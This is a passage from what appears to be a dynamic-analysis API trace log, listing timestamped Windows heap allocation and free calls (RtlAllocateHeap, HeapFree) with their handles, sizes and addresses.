returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.293] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.293] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc78cd8 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73cc0 [0031.294] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc78bc0 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75d58 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75ba8 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc761d8 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0031.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0031.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0031.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0031.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0031.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc782d8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78638 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc781b8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78368 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78128 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc785a8 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0031.527] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78cd8 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78f08 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71c80 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75268 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c90 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.528] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc796b0 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79250 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79598 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79368 | out: hHeap=0xc50000) returned 1 [0031.529] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c30 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77798 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76aa8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76b38 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc778b8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77558 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76e08 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75388 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73a50 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0031.533] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0031.534] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, 